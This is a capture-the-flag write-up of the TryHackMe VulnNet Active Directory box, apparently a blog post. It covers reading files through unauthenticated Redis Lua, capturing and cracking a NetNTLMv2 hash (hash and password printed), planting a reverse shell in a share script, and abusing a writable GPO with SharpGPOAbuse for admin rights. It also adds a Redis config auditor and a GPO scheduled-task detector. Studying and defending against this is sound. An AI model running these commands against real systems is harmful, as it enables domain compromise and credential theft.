PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2w
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49765/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-09-08T10:54:11
|_  start_date: N/A
So, we’re probably looking at a domain controller judging by the DNS service running. Running crackmapexec gives us the domain name vulnnet.local which we’ll use to further enumerate the box.
SMB allows anonymous login but has no shares to display; Redis, however, allows unauthenticated logins.
redis-cli -h 10.10.134.34
10.10.134.34:6379> config get dir
1) "dir"
2) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
We can get a username from this, but I spend a long time attempting various methods of RCE. Eventually I come across this page, which gives information on Lua scripting. Initially I wonder if it can be used for a reverse shell, but read that it can be used to read files on the local server. Trying to read some common Windows files gives errors, but when looking at system32\etc\hosts it errors at the symbol #; knowing how the file should look, this seems like it’s attempting to read and process the file.
redis-cli -h 10.10.100.148 eval "dofile('c:\\\windows\\\system32\\\drivers\\\etc\\\hosts')" 0
(error) ERR Error running script (call to f_6bbf051066d6329b897e50da35b0572543917ab4): @user_script:1: c:\windows\system32\drivers\etc\hosts:2: unexpected symbol near '#'
As a further test, and knowing the typical naming format for TryHackMe flags, we attempt to see if we can read the flag…
redis-cli -h 10.10.100.148 eval "dofile('c:\\\users\\\enterprise-security\\\desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_0a5fc213d32a52ab24b6bcf4d79058f7b03a659d): @user_script:1: c:\users\enterprise-security\desktop\user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e'
Weirdly it stripped the THM{} but otherwise output the flag.
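The foothold above rests on three Redis settings: no authentication, a listener reachable from the network, and CONFIG and EVAL left enabled so an anonymous client can read paths and run Lua. As an added defensive check, not part of the original writeup, the function below audits a redis.conf for exactly those weaknesses; both config texts are constructed samples, and the `requirepass` value is a placeholder.

```python
"""Audit a redis.conf for the settings that let an unauthenticated client
read configuration and run Lua (CONFIG GET / EVAL dofile) as seen above."""

# Commands that gave the foothold: CONFIG exposed paths, EVAL ran Lua dofile().
DANGEROUS_COMMANDS = ("CONFIG", "EVAL", "EVALSHA", "SCRIPT")

# Constructed sample resembling the box: no auth, all interfaces, nothing disabled.
WEAK_CONF = """
port 6379
bind 0.0.0.0
protected-mode no
"""

# Constructed hardened counterpart (placeholder secret, dangerous commands disabled).
HARDENED_CONF = """
port 6379
bind 127.0.0.1
protected-mode yes
requirepass <strong-secret-here>
rename-command CONFIG ""
rename-command EVAL ""
rename-command EVALSHA ""
rename-command SCRIPT ""
"""

def parse_conf(text):
    """Return {directive: [[args...], ...]} for each non-comment line, keys lowercased."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no authentication (requirepass missing)")
    for bind in conf.get("bind", [["*"]]):  # no bind directive = listen on all interfaces
        if any(addr in ("0.0.0.0", "*", "::") for addr in bind):
            findings.append("bound to all interfaces: " + " ".join(bind))
    if conf.get("protected-mode", [["yes"]])[0][0].lower() == "no":
        findings.append("protected-mode disabled")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append(f"{cmd} command not renamed/disabled")
    return findings
```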

After attempting lots of ways to get a file, I start an SMB server and see we can connect back to ourselves. This means we can start up Responder and hopefully grab the user’s hash!

We get the NetNTLMv2 hash back from Responder, so we can run it through hashcat and hopefully get our initial access.
hashcat -m 5600 enterprise-security /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
...
ENTERPRISE-SECURITY::VULNNET:42448cf121962106:8f037d8c53edc33e81727a7637c3e918:010100000000000080cb203791c3d8011a8d2776e2ec1732000000000200080035004e0039004b0001001e00570049004e002d0054004d004b0057003100340054004f0030005600580004003400570049004e002d0054004d004b0057003100340054004f003000560058002e0035004e0039004b002e004c004f00430041004c000300140035004e0039004b002e004c004f00430041004c000500140035004e0039004b002e004c004f00430041004c000700080080cb203791c3d80106000400020000000800300030000000000000000000000000300000ad926486cbafb0b4f9406c7602ca122c017e82565d6576257974f7d3620d50cc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310038002e003100300035002e00360034000000000000000000:sand_0873959498

Session..........: hashcat
Status...........: Cracked
Using our creds now we can start to further enumerate the box.

SMBmap shows us a folder we can access, so connecting to SMB we find one file, “PurgeIrrelevantData_1826.ps1”. Downloading and viewing it, it appears to just be a script, perhaps run as a scheduled task? Before trying this I test to see if we can get remote access any other way, which we don’t appear to be able to.
cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
Using my new favourite Windows Reverse Shell Generator we can modify the script and put it back on to the SMB share and wait…

Despite seeing our user having SeImpersonatePrivilege, it turns out we can’t use PrintSpoofer here (despite me trying…), so there are no easy wins. First thing I’ll do is run BloodHound to get an idea of what we can exploit.


We can see that we’ve got write privileges over the GPO SECURITY-POL-VN. After much hunting I discover SharpGPOAbuse, a tool we can use to modify the GPO; its documentation contains the syntax for running the tool against a specific user or computer controlled by the vulnerable GPO, so with it we have:
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "PrivEsc" --Author vulnnet\Administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!

PS C:\Enterprise-Share> get-aduser -identity enterprise-security -properties * | select MemberOf

MemberOf
--------
{CN=Administrators,CN=Builtin,DC=vulnnet,DC=local}
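The tool output above shows what this technique leaves behind on the domain: a new ScheduledTasks.xml under the GPO's Machine\Preferences path in SYSVOL, containing an immediate task whose command line edits the local Administrators group. As an added detection example, not code from the writeup or from SharpGPOAbuse, the function below walks such an XML file and flags tasks of that shape. The sample XML is constructed and approximates the Group Policy Preferences layout (real files also carry clsid and uid GUIDs, omitted here).

```python
"""Flag GPO-deployed scheduled tasks that add accounts to local admin groups
or run remote/encoded code, as an immediate task in SYSVOL would after a
GPO write-abuse like the one above."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: one task like the one created above, plus a routine cleanup task.
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="PrivEsc" changed="2022-09-08 11:02:00">
    <Properties action="C" name="PrivEsc" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>cmd.exe</Command>
        <Arguments>/c net localgroup administrators enterprise-security /add</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="PurgeTemp" changed="2021-01-04 09:00:00">
    <Properties action="C" name="PurgeTemp" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec>
        <Command>powershell.exe</Command>
        <Arguments>-File C:\Scripts\purge.ps1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# Argument patterns that change group membership or pull in remote/encoded code.
SUSPICIOUS = re.compile(
    r"localgroup\s+administrators|net\s+user\b.*\s/add|-enc\w*\s|"
    r"downloadstring|invoke-expression|\biex\b", re.IGNORECASE)

def find_suspicious_tasks(xml_text):
    """Return [(task name, runAs account, command line, [reasons])] for flagged tasks."""
    hits = []
    for task in ET.fromstring(xml_text):  # children are ImmediateTaskV2 / TaskV2 entries
        props = task.find("Properties")
        exe = task.find(".//Exec")
        if props is None or exe is None:
            continue
        cmdline = f"{exe.findtext('Command', '')} {exe.findtext('Arguments', '')}".strip()
        run_as = props.get("runAs", "")
        reasons = []
        if SUSPICIOUS.search(cmdline):
            reasons.append("changes admin group membership or runs remote/encoded code")
        if task.tag == "ImmediateTaskV2" and "system" in run_as.lower():
            reasons.append("immediate task running as SYSTEM at next GPO refresh")
        if reasons:
            hits.append((task.get("name"), run_as, cmdline, reasons))
    return hits
```

Pointing this at every ScheduledTasks.xml under \\<domain>\SysVol\<domain>\Policies\*\Machine\Preferences\ScheduledTasks, alongside a baseline of known GPO versions from GPT.ini, turns the artefact the tool reports into a routine check.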
Now with our new-found privileges we can PSExec into the server and grab the root flag.

This was a really informative box. I spent a significant amount of time getting the initial foothold and a while to figure out how to escalate. Lots of thanks to Google and the smart AD hackers out there!